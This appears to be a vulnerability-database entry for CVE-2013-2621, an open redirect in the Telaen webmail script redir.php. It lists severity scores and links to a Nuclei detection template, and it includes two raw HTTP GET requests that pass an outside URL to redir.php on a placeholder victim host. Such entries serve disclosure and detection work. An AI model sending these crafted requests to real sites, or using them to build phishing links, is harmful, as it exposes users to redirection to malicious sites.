| Title | Telaen => v1.3.1 - Open Redirect |
|---|---|
| Author | ctflearner |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. |
| Remediation | Upgrade to the latest version of Telaen to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.1019 |
| CVE ID | CVE-2013-2621 |
| CWE ID | CWE-601 |
| Tags | cve2013 cve telaen redirect telaen_project vuln |
Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.
GET /telaen/redir.php?https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /redir.php?https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.13 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-2621.yaml
🦈 Packet Capture: ⬇️ Download cve-2013-2621.pcap
N/AN/A